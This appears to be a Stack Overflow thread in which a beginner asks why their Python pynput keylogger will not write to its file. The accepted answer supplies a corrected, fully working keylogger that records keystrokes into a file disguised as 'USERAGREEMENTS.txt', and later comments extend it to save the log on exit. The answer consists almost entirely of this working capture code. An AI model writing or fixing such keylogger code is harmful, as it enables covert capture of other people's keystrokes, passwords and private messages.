# The write file function doesn't work. It doesn't create or write into the file

Tags: python, keylogger

import pynput

from pynput.keyboard import Key, Listener

count = 0
Keys = []

def on_press(key):
global keys, count
keys.append(key)
count +=1

```
print("{0} pressed".format (key))

if count >= 5
    count = 0
    write_file(keys)
    keys = []

    def write_file(keys):
        with open("USERAGREEMENTS.txt", "a") as f:
            for key in keys:
                k = str(key).replace("'" ",")
                if k.find("space") > 0:
                    f.write("\n")
                elif k.find("Key") == -1:
                    f.write(k)
```

"if k.find("Key.space") > 0:"

def on_press(key):
print("{0} pressed".format(key))

def on_release(key):
if key == Key.esc:
return False

with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()

Answer (score 0, accepted):

There are so much infect hell of problems in your code so after removing

- Syntax Errors
- Logical Errors
- Indentation Problems
- Removing duplicate `on_press` event

the final working version of your code is following

```
import pynput
from pynput.keyboard import Key, Listener

count = 0
Keys = []

def on_press(key):
    global Keys, count
    Keys.append(key)
    count += 1
    print("{0} pressed".format(key))

    if count >= 5:
        count = 0
        write_file(Keys)
        Keys = []

def write_file(keys):
    with open("USERAGREEMENTS.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                f.write("\n")
            elif k.find("Key") == -1:
                f.write(k)

def on_release(key):
    if key == Key.esc:
        write_file(Keys)
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Comment: Thank you so much. But when I click "escape" to end the logging process it doesn't save to the file. What should I do?

Comment: you need to call save_file again in the condition where you detected escape key

Comment: don't forget to accept answer if it helps you

Comment: I am a really noobie. I don't even know how to code. I watched a guy youtube tutorial. Can you write the code please so I can add it? If not, it's totally okay, thank you for the time you gave to me to help me. Have a great day! Your answer was useful!

Comment: Unfortunatlely I need 15 reputation to upvote your answers. I'm sorry :(

Comment: there is a tick mark so that you can accept the answer without upvote lolz also i modified code for your escape requirement